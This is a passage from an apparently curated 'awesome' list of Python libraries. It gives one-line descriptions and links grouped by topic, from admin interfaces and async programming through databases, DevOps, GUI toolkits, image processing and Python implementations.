skin for the Django Admin-Interface. * [flask-admin](https://github.com/flask-admin/flask-admin) - Simple and extensible administrative interface framework for Flask. * [flower](https://github.com/mher/flower) - Real-time monitor and web admin for Celery. * [jet-bridge](https://github.com/jet-admin/jet-bridge) - Admin panel framework for any application with nice UI (ex Jet Django). * [wooey](https://github.com/wooey/wooey) - A Django app which creates automatic web UIs for Python scripts. * [streamlit](https://github.com/streamlit/streamlit) - A framework which lets you build dashboards, generate reports, or create chat apps in minutes. ## Algorithms and Design Patterns *Python implementation of data structures, algorithms and design patterns. Also see [awesome-algorithms](https://github.com/tayllan/awesome-algorithms).* * Algorithms * [algorithms](https://github.com/keon/algorithms) - Minimal examples of data structures and algorithms. * [python-ds](https://github.com/prabhupant/python-ds) - A collection of data structure and algorithms for coding interviews. * [sortedcontainers](https://github.com/grantjenks/python-sortedcontainers) - Fast and pure-Python implementation of sorted collections. * [thealgorithms](https://github.com/TheAlgorithms/Python) - All Algorithms implemented in Python. * Design Patterns * [pypattyrn](https://github.com/tylerlaberge/PyPattyrn) - A simple yet effective library for implementing common design patterns. * [python-patterns](https://github.com/faif/python-patterns) - A collection of design patterns in Python. * [transitions](https://github.com/pytransitions/transitions) - A lightweight, object-oriented finite state machine implementation. ## ASGI Servers *[ASGI](https://asgi.readthedocs.io/en/latest/)-compatible web servers.* * [daphne](https://github.com/django/daphne) - A HTTP, HTTP2 and WebSocket protocol server for ASGI and ASGI-HTTP. * [uvicorn](https://github.com/encode/uvicorn) - A lightning-fast ASGI server implementation, using uvloop and httptools. * [hypercorn](https://github.com/pgjones/hypercorn) - An ASGI and WSGI Server based on Hyper libraries and inspired by Gunicorn. ## Asynchronous Programming *Libraries for asynchronous, concurrent and parallel execution. Also see [awesome-asyncio](https://github.com/timofurrer/awesome-asyncio).* * [asyncio](https://docs.python.org/3/library/asyncio.html) - (Python standard library) Asynchronous I/O, event loop, coroutines and tasks. - [awesome-asyncio](https://github.com/timofurrer/awesome-asyncio) * [concurrent.futures](https://docs.python.org/3/library/concurrent.futures.html) - (Python standard library) A high-level interface for asynchronously executing callables. * [multiprocessing](https://docs.python.org/3/library/multiprocessing.html) - (Python standard library) Process-based parallelism. * [trio](https://github.com/python-trio/trio) - A friendly library for async concurrency and I/O. * [twisted](https://github.com/twisted/twisted) - An event-driven networking engine. * [uvloop](https://github.com/MagicStack/uvloop) - Ultra fast asyncio event loop. * [eventlet](https://github.com/eventlet/eventlet) - Asynchronous framework with WSGI support. * [gevent](https://github.com/gevent/gevent) - A coroutine-based Python networking library that uses [greenlet](https://github.com/python-greenlet/greenlet). ## Audio *Libraries for manipulating audio and its metadata.* * Audio * [audioread](https://github.com/beetbox/audioread) - Cross-library (GStreamer + Core Audio + MAD + FFmpeg) audio decoding. * [audioFlux](https://github.com/libAudioFlux/audioFlux) - A library for audio and music analysis, feature extraction. * [dejavu](https://github.com/worldveil/dejavu) - Audio fingerprinting and recognition. * [kapre](https://github.com/keunwoochoi/kapre) - Keras Audio Preprocessors. * [librosa](https://github.com/librosa/librosa) - Python library for audio and music analysis. * [matchering](https://github.com/sergree/matchering) - A library for automated reference audio mastering. * [mingus](http://bspaans.github.io/python-mingus/) - An advanced music theory and notation package with MIDI file and playback support. * [pyaudioanalysis](https://github.com/tyiannak/pyAudioAnalysis) - Audio feature extraction, classification, segmentation and applications. * [pydub](https://github.com/jiaaro/pydub) - Manipulate audio with a simple and easy high level interface. * [timeside](https://github.com/Parisson/TimeSide) - Open web audio processing framework. * Metadata * [beets](https://github.com/beetbox/beets) - A music library manager and [MusicBrainz](https://musicbrainz.org/) tagger. * [eyed3](https://github.com/nicfit/eyeD3) - A tool for working with audio files, specifically MP3 files containing ID3 metadata. * [mutagen](https://github.com/quodlibet/mutagen) - A Python module to handle audio metadata. * [tinytag](https://github.com/devsnd/tinytag) - A library for reading music meta data of MP3, OGG, FLAC and Wave files. ## Authentication *Libraries for implementing authentications schemes.* * OAuth * [authlib](https://github.com/lepture/authlib) - JavaScript Object Signing and Encryption draft implementation. * [django-allauth](https://github.com/pennersr/django-allauth) - Authentication app for Django that "just works." * [django-oauth-toolkit](https://github.com/jazzband/django-oauth-toolkit) - OAuth 2 goodies for Django. * [oauthlib](https://github.com/oauthlib/oauthlib) - A generic and thorough implementation of the OAuth request-signing logic. * JWT * [pyjwt](https://github.com/jpadilla/pyjwt) - JSON Web Token implementation in Python. * [python-jose](https://github.com/mpdavis/python-jose/) - A JOSE implementation in Python. ## Build Tools *Compile software from source code.* * [bitbake](https://github.com/openembedded/bitbake) - A make-like build tool for embedded Linux. * [buildout](https://github.com/buildout/buildout) - A build system for creating, assembling and deploying applications from multiple parts. * [platformio](https://github.com/platformio/platformio-core) - A console tool to build code with different development platforms. * [pybuilder](https://github.com/pybuilder/pybuilder) - A continuous build tool written in pure Python. * [scons](https://github.com/SCons/scons) - A software construction tool. ## Built-in Classes Enhancement *Libraries for enhancing Python built-in classes.* * [attrs](https://github.com/python-attrs/attrs) - Replacement for `__init__`, `__eq__`, `__repr__`, etc. boilerplate in class definitions. * [bidict](https://github.com/jab/bidict) - Efficient, Pythonic bidirectional map data structures and related functionality.. * [box](https://github.com/cdgriffith/Box) - Python dictionaries with advanced dot notation access. * [dataclasses](https://docs.python.org/3/library/dataclasses.html) - (Python standard library) Data classes. * [dotteddict](https://github.com/carlosescri/DottedDict) - A library that provides a method of accessing lists and dicts with a dotted path notation. ## CMS *Content Management Systems.* * [feincms](https://github.com/feincms/feincms) - One of the most advanced Content Management Systems built on Django. * [indico](https://github.com/indico/indico) - A feature-rich event management system, made @ [CERN](https://en.wikipedia.org/wiki/CERN). * [wagtail](https://github.com/wagtail/wagtail) - A Django content management system. ## Caching *Libraries for caching data.* * [beaker](https://github.com/bbangert/beaker) - A WSGI middleware for sessions and caching. * [django-cache-machine](https://github.com/django-cache-machine/django-cache-machine) - Automatic caching and invalidation for Django models. * [django-cacheops](https://github.com/Suor/django-cacheops) - A slick ORM cache with automatic granular event-driven invalidation. * [dogpile.cache](https://github.com/sqlalchemy/dogpile.cache) - dogpile.cache is a next generation replacement for Beaker made by the same authors. * [hermescache](https://pypi.org/project/HermesCache/) - Python caching library with tag-based invalidation and dogpile effect prevention. * [pylibmc](https://github.com/lericson/pylibmc) - A Python wrapper around the [libmemcached](https://libmemcached.org/libMemcached.html) interface. * [python-diskcache](https://github.com/grantjenks/python-diskcache) - SQLite and file backed cache backend with faster lookups than memcached and redis. ## ChatOps Tools *Libraries for chatbot development.* * [errbot](https://github.com/errbotio/errbot/) - The easiest and most popular chatbot to implement ChatOps. ## Code Analysis *Tools of static analysis, linters and code quality checkers. Also see [awesome-static-analysis](https://github.com/mre/awesome-static-analysis).* * Code Analysis * [code2flow](https://github.com/scottrogowski/code2flow) - Turn your Python and JavaScript code into DOT flowcharts. * [prospector](https://github.com/PyCQA/prospector) - A tool to analyse Python code. * [vulture](https://github.com/jendrikseipp/vulture) - A tool for finding and analysing dead Python code. * Code Linters * [flake8](https://github.com/PyCQA/flake8) - A wrapper around `pycodestyle`, `pyflakes` and McCabe. * [awesome-flake8-extensions](https://github.com/DmytroLitvinov/awesome-flake8-extensions) * [pylint](https://github.com/pylint-dev/pylint) - A fully customizable source code analyzer. * Code Formatters * [black](https://github.com/psf/black) - The uncompromising Python code formatter. * [isort](https://github.com/timothycrosley/isort) - A Python utility / library to sort imports. * [yapf](https://github.com/google/yapf) - Yet another Python code formatter from Google. * Static Type Checkers, also see [awesome-python-typing](https://github.com/typeddjango/awesome-python-typing) * [mypy](https://github.com/python/mypy) - Check variable types during compile time. * [pyre-check](https://github.com/facebook/pyre-check) - Performant type checking. * [typeshed](https://github.com/python/typeshed) - Collection of library stubs for Python, with static types. * Static Type Annotations Generators * [monkeytype](https://github.com/Instagram/MonkeyType) - A system for Python that generates static type annotations by collecting runtime types. * [pytype](https://github.com/google/pytype) - Pytype checks and infers types for Python code - without requiring type annotations. ## Command-line Interface Development *Libraries for building command-line applications.* * Command-line Application Development * [cement](https://github.com/datafolklabs/cement) - CLI Application Framework for Python. * [click](https://github.com/pallets/click/) - A package for creating beautiful command line interfaces in a composable way. * [cliff](https://github.com/openstack/cliff) - A framework for creating command-line programs with multi-level commands. * [python-fire](https://github.com/google/python-fire) - A library for creating command line interfaces from absolutely any Python object. * [python-prompt-toolkit](https://github.com/prompt-toolkit/python-prompt-toolkit) - A library for building powerful interactive command lines. * Terminal Rendering * [alive-progress](https://github.com/rsalmei/alive-progress) - A new kind of Progress Bar, with real-time throughput, eta and very cool animations. * [asciimatics](https://github.com/peterbrittain/asciimatics) - A package to create full-screen text UIs (from interactive forms to ASCII animations). * [bashplotlib](https://github.com/glamp/bashplotlib) - Making basic plots in the terminal. * [colorama](https://github.com/tartley/colorama) - Cross-platform colored terminal text. * [rich](https://github.com/Textualize/rich) - Python library for rich text and beautiful formatting in the terminal. Also provides a great `RichHandler` log handler. * [tqdm](https://github.com/tqdm/tqdm) - Fast, extensible progress bar for loops and CLI. ## Command-line Tools *Useful CLI-based tools for productivity.* * Productivity Tools * [copier](https://github.com/copier-org/copier) - A library and command-line utility for rendering projects templates. * [cookiecutter](https://github.com/cookiecutter/cookiecutter) - A command-line utility that creates projects from cookiecutters (project templates). * [doitlive](https://github.com/sloria/doitlive) - A tool for live presentations in the terminal. * [howdoi](https://github.com/gleitz/howdoi) - Instant coding answers via the command line. * [invoke](https://github.com/pyinvoke/invoke) - A tool for managing shell-oriented subprocesses and organizing executable Python code into CLI-invokable tasks. * [pathpicker](https://github.com/facebook/PathPicker) - Select files out of bash output. * [thefuck](https://github.com/nvbn/thefuck) - Correcting your previous console command. * [tmuxp](https://github.com/tmux-python/tmuxp) - A [tmux](https://github.com/tmux/tmux) session manager. * [try](https://github.com/timofurrer/try) - A dead simple CLI to try out python packages - it's never been easier. * CLI Enhancements * [httpie](https://github.com/httpie/cli) - A command line HTTP client, a user-friendly cURL replacement. * [iredis](https://github.com/laixintao/iredis) - Redis CLI with autocompletion and syntax highlighting. * [litecli](https://github.com/dbcli/litecli) - SQLite CLI with autocompletion and syntax highlighting. * [mycli](https://github.com/dbcli/mycli) - MySQL CLI with autocompletion and syntax highlighting. * [pgcli](https://github.com/dbcli/pgcli) - PostgreSQL CLI with autocompletion and syntax highlighting. ## Computer Vision *Libraries for Computer Vision.* * [easyocr](https://github.com/JaidedAI/EasyOCR) - Ready-to-use OCR with 40+ languages supported. * [kornia](https://github.com/kornia/kornia/) - Open Source Differentiable Computer Vision Library for PyTorch. * [opencv](https://opencv.org/) - Open Source Computer Vision Library. * [pytesseract](https://github.com/madmaze/pytesseract) - A wrapper for [Google Tesseract OCR](https://github.com/tesseract-ocr). * [tesserocr](https://github.com/sirfz/tesserocr) - Another simple, Pillow-friendly, wrapper around the `tesseract-ocr` API for OCR. ## Configuration Files *Libraries for storing and parsing configuration options.* * [configparser](https://docs.python.org/3/library/configparser.html) - (Python standard library) INI file parser. * [configobj](https://github.com/DiffSK/configobj) - INI file parser with validation. * [hydra](https://github.com/facebookresearch/hydra) - Hydra is a framework for elegantly configuring complex applications. * [python-decouple](https://github.com/HBNetwork/python-decouple) - Strict separation of settings from code. ## Cryptography * [cryptography](https://github.com/pyca/cryptography) - A package designed to expose cryptographic primitives and recipes to Python developers. * [paramiko](https://github.com/paramiko/paramiko) - The leading native Python SSHv2 protocol library. * [pynacl](https://github.com/pyca/pynacl) - Python binding to the Networking and Cryptography (NaCl) library. ## Data Analysis *Libraries for data analyzing.* * [pandas](http://pandas.pydata.org/) - A library providing high-performance, easy-to-use data structures and data analysis tools. * [aws-sdk-pandas](https://github.com/aws/aws-sdk-pandas) - Pandas on AWS. * [datasette](https://github.com/simonw/datasette) - An open source multi-tool for exploring and publishing data. * [optimus](https://github.com/hi-primus/optimus) - Agile Data Science Workflows made easy with PySpark. ## Data Validation *Libraries for validating data. Used for forms in many cases.* * [cerberus](https://github.com/pyeve/cerberus) - A lightweight and extensible data validation library. * [colander](https://github.com/Pylons/colander) - Validating and deserializing data obtained via XML, JSON, an HTML form post. * [jsonschema](https://github.com/python-jsonschema/jsonschema) - An implementation of [JSON Schema](http://json-schema.org/) for Python. * [schema](https://github.com/keleshev/schema) - A library for validating Python data structures. * [schematics](https://github.com/schematics/schematics) - Data Structure Validation. * [voluptuous](https://github.com/alecthomas/voluptuous) - A Python data validation library. * [pydantic](https://github.com/pydantic/pydantic) - Data validation using Python type hints. ## Data Visualization *Libraries for visualizing data. Also see [awesome-javascript](https://github.com/sorrycc/awesome-javascript#data-visualization).* * [altair](https://github.com/altair-viz/altair) - Declarative statistical visualization library for Python. * [bokeh](https://github.com/bokeh/bokeh) - Interactive Web Plotting for Python. * [bqplot](https://github.com/bloomberg/bqplot) - Interactive Plotting Library for the Jupyter Notebook. * [cartopy](https://github.com/SciTools/cartopy) - A cartographic python library with matplotlib support. * [diagrams](https://github.com/mingrammer/diagrams) - Diagram as Code. * [matplotlib](https://github.com/matplotlib/matplotlib) - A Python 2D plotting library. * [plotnine](https://github.com/has2k1/plotnine) - A grammar of graphics for Python based on ggplot2. * [pygal](https://github.com/Kozea/pygal) - A Python SVG Charts Creator. * [pygraphviz](https://github.com/pygraphviz/pygraphviz/) - Python interface to [Graphviz](http://www.graphviz.org/). * [pyqtgraph](https://github.com/pyqtgraph/pyqtgraph) - Interactive and realtime 2D/3D/Image plotting and science/engineering widgets. * [seaborn](https://github.com/mwaskom/seaborn) - Statistical data visualization using Matplotlib. * [vispy](https://github.com/vispy/vispy) - High-performance scientific visualization based on OpenGL. ## Database *Databases implemented in Python.* * [pickleDB](https://github.com/patx/pickledb) - A simple and lightweight key-value store for Python. * [tinydb](https://github.com/msiemens/tinydb) - A tiny, document-oriented database. * [zodb](https://github.com/zopefoundation/ZODB) - A native object database for Python. A key-value and object graph database. ## Database Drivers *Libraries for connecting and operating databases.* * MySQL - [awesome-mysql](http://shlomi-noach.github.io/awesome-mysql/) * [mysqlclient](https://github.com/PyMySQL/mysqlclient) - MySQL connector with Python 3 support ([mysql-python](https://sourceforge.net/projects/mysql-python/) fork). * [pymysql](https://github.com/PyMySQL/PyMySQL) - A pure Python MySQL driver compatible to mysql-python. * PostgreSQL - [awesome-postgres](https://github.com/dhamaniasad/awesome-postgres) * [psycopg](https://github.com/psycopg/psycopg) - The most popular PostgreSQL adapter for Python. * SQlite - [awesome-sqlite](https://github.com/planetopendata/awesome-sqlite) * [sqlite3](https://docs.python.org/3/library/sqlite3.html) - (Python standard library) SQlite interface compliant with DB-API 2.0. * [sqlite-utils](https://github.com/simonw/sqlite-utils) - Python CLI utility and library for manipulating SQLite databases. * Other Relational Databases * [pymssql](https://github.com/pymssql/pymssql) - A simple database interface to Microsoft SQL Server. * [clickhouse-driver](https://github.com/mymarilyn/clickhouse-driver) - Python driver with native interface for ClickHouse. * NoSQL Databases * [cassandra-driver](https://github.com/datastax/python-driver) - The Python Driver for Apache Cassandra. * [happybase](https://github.com/python-happybase/happybase) - A developer-friendly library for Apache HBase. * [kafka-python](https://github.com/dpkp/kafka-python) - The Python client for Apache Kafka. * [pymongo](https://github.com/mongodb/mongo-python-driver) - The official Python client for MongoDB. * [motor](https://github.com/mongodb/motor) - The async Python driver for MongoDB. * [redis-py](https://github.com/redis/redis-py) - The Python client for Redis. ## Date and Time *Libraries for working with dates and times.* * [arrow](https://github.com/arrow-py/arrow) - A Python library that offers a sensible and human-friendly approach to creating, manipulating, formatting and converting dates, times and timestamps. * [dateutil](https://github.com/dateutil/dateutil) - Extensions to the standard Python [datetime](https://docs.python.org/3/library/datetime.html) module. * [pendulum](https://github.com/sdispater/pendulum) - Python datetimes made easy. * [pytz](https://pypi.org/project/pytz/) - World timezone definitions, modern and historical. Brings the [tz database](https://en.wikipedia.org/wiki/Tz_database) into Python. ## Debugging Tools *Libraries for debugging code.* * pdb-like Debugger * [ipdb](https://github.com/gotcha/ipdb) - IPython-enabled [pdb](https://docs.python.org/3/library/pdb.html). * [pudb](https://github.com/inducer/pudb) - A full-screen, console-based Python debugger. * Tracing * [manhole](https://github.com/ionelmc/python-manhole) - Debugging UNIX socket connections and present the stacktraces for all threads and an interactive prompt. * [python-hunter](https://github.com/ionelmc/python-hunter) - A flexible code tracing toolkit. * Profiler * [py-spy](https://github.com/benfred/py-spy) - A sampling profiler for Python programs. Written in Rust. * [vprof](https://github.com/nvdv/vprof) - Visual Python profiler. * Others * [django-debug-toolbar](https://github.com/jazzband/django-debug-toolbar) - Display various debug information for Django. * [flask-debugtoolbar](https://github.com/pallets-eco/flask-debugtoolbar) - A port of the django-debug-toolbar to flask. * [icecream](https://github.com/gruns/icecream) - Inspect variables, expressions, and program execution with a single, simple function call. * [pyelftools](https://github.com/eliben/pyelftools) - Parsing and analyzing ELF files and DWARF debugging information. ## Deep Learning *Frameworks for Neural Networks and Deep Learning. Also see [awesome-deep-learning](https://github.com/ChristosChristofidis/awesome-deep-learning).* * [keras](https://github.com/keras-team/keras) - A high-level neural networks library and capable of running on top of either TensorFlow or Theano. * [pytorch](https://github.com/pytorch/pytorch) - Tensors and Dynamic neural networks in Python with strong GPU acceleration. * [pytorch-lightning](https://github.com/Lightning-AI/pytorch-lightning) - Deep learning framework to train, deploy, and ship AI products Lightning fast. * [stable-baselines3](https://github.com/DLR-RM/stable-baselines3) - PyTorch implementations of Stable Baselines (deep) reinforcement learning algorithms. * [tensorflow](https://github.com/tensorflow/tensorflow) - The most popular Deep Learning framework created by Google. * [theano](https://github.com/Theano/Theano) - A library for fast numerical computation. ## DevOps Tools *Software and libraries for DevOps.* * Configuration Management * [ansible](https://github.com/ansible/ansible) - A radically simple IT automation platform. * [cloudinit](https://github.com/canonical/cloud-init) - A multi-distribution package that handles early initialization of a cloud instance. * [openstack](https://www.openstack.org/) - Open source software for building private and public clouds. * [pyinfra](https://github.com/pyinfra-dev/pyinfra) - A versatile CLI tools and python libraries to automate infrastructure. * [saltstack](https://github.com/saltstack/salt) - Infrastructure automation and management system. * SSH-style Deployment * [cuisine](https://github.com/sebastien/cuisine) - Chef-like functionality for Fabric. * [fabric](https://github.com/fabric/fabric) - A simple, Pythonic tool for remote execution and deployment. * Process Management * [supervisor](https://github.com/Supervisor/supervisor) - Supervisor process control system for UNIX. * Monitoring * [psutil](https://github.com/giampaolo/psutil) - A cross-platform process and system utilities module. * Backup * [borg](https://github.com/borgbackup/borg) - A deduplicating archiver with compression and encryption. ## Distributed Computing *Frameworks and libraries for Distributed Computing.* * Batch Processing * [dask](https://github.com/dask/dask) - A flexible parallel computing library for analytic computing. * [luigi](https://github.com/spotify/luigi) - A module that helps you build complex pipelines of batch jobs. * [PySpark](https://github.com/apache/spark) - [Apache Spark](https://spark.apache.org/) Python API. * [Ray](https://github.com/ray-project/ray/) - A system for parallel and distributed Python that unifies the machine learning ecosystem. * Stream Processing * [faust](https://github.com/robinhood/faust) - A stream processing library, porting the ideas from [Kafka Streams](https://kafka.apache.org/documentation/streams/) to Python. * [streamparse](https://github.com/Parsely/streamparse) - Run Python code against real-time streams of data via [Apache Storm](http://storm.apache.org/). ## Distribution *Libraries to create packaged executables for release distribution.* * [py2app](https://github.com/ronaldoussoren/py2app) - Freezes Python scripts (Mac OS X). * [py2exe](https://github.com/py2exe/py2exe) - Freezes Python scripts (Windows). * [pyarmor](https://github.com/dashingsoft/pyarmor) - A tool used to obfuscate python scripts, bind obfuscated scripts to fixed machine or expire obfuscated scripts. * [pyinstaller](https://github.com/pyinstaller/pyinstaller) - Converts Python programs into stand-alone executables (cross-platform). * [shiv](https://github.com/linkedin/shiv) - A command line utility for building fully self-contained zipapps (PEP 441), but with all their dependencies included. ## Documentation *Libraries for generating project documentation.* * [sphinx](https://github.com/sphinx-doc/sphinx/) - Python Documentation generator. * [awesome-sphinxdoc](https://github.com/yoloseem/awesome-sphinxdoc) * [pdoc](https://github.com/mitmproxy/pdoc) - Epydoc replacement to auto generate API documentation for Python libraries. ## Downloader *Libraries for downloading.* * [akshare](https://github.com/jindaxiang/akshare) - A financial data interface library, built for human beings! * [s3cmd](https://github.com/s3tools/s3cmd) - A command line tool for managing Amazon S3 and CloudFront. * [youtube-dl](https://github.com/ytdl-org/youtube-dl/) - A command-line program to download videos from YouTube and other video sites. ## Editor Plugins and IDEs * Emacs * [elpy](https://github.com/jorgenschaefer/elpy) - Emacs Python Development Environment. * Vim * [jedi-vim](https://github.com/davidhalter/jedi-vim) - Vim bindings for the Jedi auto-completion library for Python. * [python-mode](https://github.com/python-mode/python-mode) - An all in one plugin for turning Vim into a Python IDE. * [YouCompleteMe](https://github.com/Valloric/YouCompleteMe) - Includes [Jedi](https://github.com/davidhalter/jedi)-based completion engine for Python. * Visual Studio * [PTVS](https://github.com/Microsoft/PTVS) - Python Tools for Visual Studio. * Visual Studio Code * [Python](https://marketplace.visualstudio.com/items?itemName=ms-python.python) - The official VSCode extension with rich support for Python. * IDE * [PyCharm](https://www.jetbrains.com/pycharm/) - Commercial Python IDE by JetBrains. Has free community edition available. * [spyder](https://github.com/spyder-ide/spyder) - Open Source Python IDE. ## Email *Libraries for sending and parsing email.* * Mail Servers * [modoboa](https://github.com/modoboa/modoboa) - A mail hosting and management platform including a modern Web UI. * [salmon](https://github.com/moggers87/salmon) - A Python Mail Server. * Clients * [imbox](https://github.com/martinrusev/imbox) - Python IMAP for Humans. * [yagmail](https://github.com/kootenpv/yagmail) - Yet another Gmail/SMTP client. * Others * [flanker](https://github.com/mailgun/flanker) - An email address and Mime parsing library. * [mailer](https://github.com/marrow/mailer) - High-performance extensible mail delivery framework. ## Environment Management *Libraries for Python version and virtual environment management.* * [pyenv](https://github.com/pyenv/pyenv) - Simple Python version management. * [virtualenv](https://github.com/pypa/virtualenv) - A tool to create isolated Python environments. ## File Manipulation *Libraries for file manipulation.* * [mimetypes](https://docs.python.org/3/library/mimetypes.html) - (Python standard library) Map filenames to MIME types. * [pathlib](https://docs.python.org/3/library/pathlib.html) - (Python standard library) An cross-platform, object-oriented path library. * [path.py](https://github.com/jaraco/path.py) - A module wrapper for [os.path](https://docs.python.org/3/library/os.path.html). * [python-magic](https://github.com/ahupp/python-magic) - A Python interface to the libmagic file type identification library. * [watchdog](https://github.com/gorakhargosh/watchdog) - API and shell utilities to monitor file system events. ## Functional Programming *Functional Programming with Python.* * [coconut](https://github.com/evhub/coconut) - A variant of Python built for simple, elegant, Pythonic functional programming. * [funcy](https://github.com/Suor/funcy) - A fancy and practical functional tools. * [more-itertools](https://github.com/erikrose/more-itertools) - More routines for operating on iterables, beyond `itertools`. * [returns](https://github.com/dry-python/returns) - A set of type-safe monads, transformers, and composition utilities. * [cytoolz](https://github.com/pytoolz/cytoolz/) - Cython implementation of `Toolz`: High performance functional utilities. * [toolz](https://github.com/pytoolz/toolz) - A collection of functional utilities for iterators, functions, and dictionaries. ## GUI Development *Libraries for working with graphical user interface applications.* * [curses](https://docs.python.org/3/library/curses.html) - Built-in wrapper for [ncurses](http://www.gnu.org/software/ncurses/) used to create terminal GUI applications. * [Eel](https://github.com/ChrisKnott/Eel) - A library for making simple Electron-like offline HTML/JS GUI apps. * [enaml](https://github.com/nucleic/enaml) - Creating beautiful user-interfaces with Declarative Syntax like QML. * [Flexx](https://github.com/zoofIO/flexx) - Flexx is a pure Python toolkit for creating GUI's, that uses web technology for its rendering. * [Gooey](https://github.com/chriskiehl/Gooey) - Turn command line programs into a full GUI application with one line. * [kivy](https://kivy.org/) - A library for creating NUI applications, running on Windows, Linux, Mac OS X, Android and iOS. * [pyglet](https://github.com/pyglet/pyglet) - A cross-platform windowing and multimedia library for Python. * [PyGObject](https://pygobject.readthedocs.io/) - Python Bindings for GLib/GObject/GIO/GTK+ (GTK+3). * [PyQt](https://doc.qt.io/qtforpython/) - Python bindings for the [Qt](https://www.qt.io/) cross-platform application and UI framework. * [PySimpleGUI](https://github.com/PySimpleGUI/PySimpleGUI) - Wrapper for tkinter, Qt, WxPython and Remi. * [pywebview](https://github.com/r0x0r/pywebview/) - A lightweight cross-platform native wrapper around a webview component. * [Tkinter](https://wiki.python.org/moin/TkInter) - Tkinter is Python's de-facto standard GUI package. * [Toga](https://github.com/pybee/toga) - A Python native, OS native GUI toolkit. * [urwid](http://urwid.org/) - A library for creating terminal GUI applications with strong support for widgets, events, rich colors, etc. * [wxPython](https://wxpython.org/) - A blending of the wxWidgets C++ class library with the Python. * [DearPyGui](https://github.com/RaylockLLC/DearPyGui/) - A Simple GPU accelerated Python GUI framework ## GraphQL *Libraries for working with GraphQL.* * [graphene](https://github.com/graphql-python/graphene/) - GraphQL framework for Python. ## Game Development *Awesome game development libraries.* * [Arcade](https://api.arcade.academy/en/latest/) - Arcade is a modern Python framework for crafting games with compelling graphics and sound. * [Cocos2d](https://www.cocos.com/en/cocos2d-x) - cocos2d is a framework for building 2D games, demos, and other graphical/interactive applications. * [Harfang3D](http://www.harfang3d.com) - Python framework for 3D, VR and game development. * [Panda3D](https://www.panda3d.org/) - 3D game engine developed by Disney. * [Pygame](http://www.pygame.org/news.html) - Pygame is a set of Python modules designed for writing games. * [PyOgre](http://www.ogre3d.org/tikiwiki/PyOgre) - Python bindings for the Ogre 3D render engine, can be used for games, simulations, anything 3D. * [PyOpenGL](http://pyopengl.sourceforge.net/) - Python ctypes bindings for OpenGL and it's related APIs. * [PySDL2](https://pysdl2.readthedocs.io) - A ctypes based wrapper for the SDL2 library. * [RenPy](https://www.renpy.org/) - A Visual Novel engine. ## Geolocation *Libraries for geocoding addresses and working with latitudes and longitudes.* * [django-countries](https://github.com/SmileyChris/django-countries) - A Django app that provides a country field for models and forms. * [geodjango](https://docs.djangoproject.com/en/dev/ref/contrib/gis/) - A world-class geographic web framework. * [geojson](https://github.com/jazzband/geojson) - Python bindings and utilities for GeoJSON. * [geopy](https://github.com/geopy/geopy) - Python Geocoding Toolbox. ## HTML Manipulation *Libraries for working with HTML and XML.* * [beautifulsoup](https://www.crummy.com/software/BeautifulSoup/bs4/doc/) - Providing Pythonic idioms for iterating, searching, and modifying HTML or XML. * [bleach](https://github.com/mozilla/bleach) - A whitelist-based HTML sanitization and text linkification library. * [cssutils](https://pypi.org/project/cssutils/) - A CSS library for Python. * [html5lib](https://github.com/html5lib/html5lib-python) - A standards-compliant library for parsing and serializing HTML documents and fragments. * [lxml](http://lxml.de/) - A very fast, easy-to-use and versatile library for handling HTML and XML. * [markupsafe](https://github.com/pallets/markupsafe) - Implements a XML/HTML/XHTML Markup safe string for Python. * [pyquery](https://github.com/gawel/pyquery) - A jQuery-like library for parsing HTML. * [untangle](https://github.com/stchris/untangle) - Converts XML documents to Python objects for easy access. * [WeasyPrint](http://weasyprint.org) - A visual rendering engine for HTML and CSS that can export to PDF. * [xmldataset](https://xmldataset.readthedocs.io/en/latest/) - Simple XML Parsing. * [xmltodict](https://github.com/martinblech/xmltodict) - Working with XML feel like you are working with JSON. ## HTTP Clients *Libraries for working with HTTP.* * [httpx](https://github.com/encode/httpx) - A next generation HTTP client for Python. * [requests](https://github.com/psf/requests) - HTTP Requests for Humans. * [treq](https://github.com/twisted/treq) - Python requests like API built on top of Twisted's HTTP client. * [urllib3](https://github.com/urllib3/urllib3) - A HTTP library with thread-safe connection pooling, file post support, sanity friendly. ## Hardware *Libraries for programming with hardware.* * [keyboard](https://github.com/boppreh/keyboard) - Hook and simulate global keyboard events on Windows and Linux. * [mouse](https://github.com/boppreh/mouse) - Hook and simulate global mouse events on Windows and Linux. * [pynput](https://github.com/moses-palmer/pynput) - A library to control and monitor input devices. * [scapy](https://github.com/secdev/scapy) - A brilliant packet manipulation library. ## Image Processing *Libraries for manipulating images.* * [pillow](https://github.com/python-pillow/Pillow) - Pillow is the friendly [PIL](http://www.pythonware.com/products/pil/) fork. * [python-barcode](https://github.com/WhyNotHugo/python-barcode) - Create barcodes in Python with no extra dependencies. * [pymatting](http://github.com/pymatting/pymatting) - A library for alpha matting. * [python-qrcode](https://github.com/lincolnloop/python-qrcode) - A pure Python QR Code generator. * [pywal](https://github.com/dylanaraps/pywal) - A tool that generates color schemes from images. * [pyvips](https://github.com/libvips/pyvips) - A fast image processing library with low memory needs. * [quads](https://github.com/fogleman/Quads) - Computer art based on quadtrees. * [scikit-image](http://scikit-image.org/) - A Python library for (scientific) image processing. * [thumbor](https://github.com/thumbor/thumbor) - A smart imaging service. It enables on-demand crop, re-sizing and flipping of images. * [wand](https://github.com/emcconville/wand) - Python bindings for [MagickWand](http://www.imagemagick.org/script/magick-wand.php), C API for ImageMagick. ## Implementations *Implementations of Python.* * [cpython](https://github.com/python/cpython) - **Default, most widely used implementation of the Python programming language written in C.** * [cython](https://github.com/cython/cython) - Optimizing Static Compiler for Python. * [clpython](https://github.com/metawilm/cl-python) - Implementation of the Python programming language written in Common Lisp. * [ironpython](https://github.com/IronLanguages/ironpython3) - Implementation of the Python programming language written in C#. * [micropython](https://github.com/micropython/micropython) - A lean and efficient Python programming language implementation. * [numba](https://github.com/numba/numba) - Python JIT compiler to LLVM aimed at scientific Python. * [peachpy](https://github.com/Maratyszcza/PeachPy) - x86-64 assembler embedded in Python. * [pypy](https://foss.heptapod.net/pypy/pypy) - A very fast and compliant implementation of the Python language. * [pyston](https://github.com/pyston/pyston/) - A Python implementation using JIT techniques. ## Interactive Interpreter *Interactive Python interpreters (REPL).* * [bpython](https://github.com/bpython/bpython) - A fancy interface to the Python interpreter. * [Jupyter Notebook (IPython)](https://jupyter.org) - A rich toolkit to help you make the most out of using Python interactively. * [awesome-jupyter](https://github.com/markusschanta/awesome-jupyter) * [ptpython](https://github.com/jonathanslenders/ptpython) - Advanced Python REPL built on top of the [python-prompt-toolkit](https://github.com/jonathanslenders/python-prompt-toolkit). ## Internationalization *Libraries for working with i18n.* * 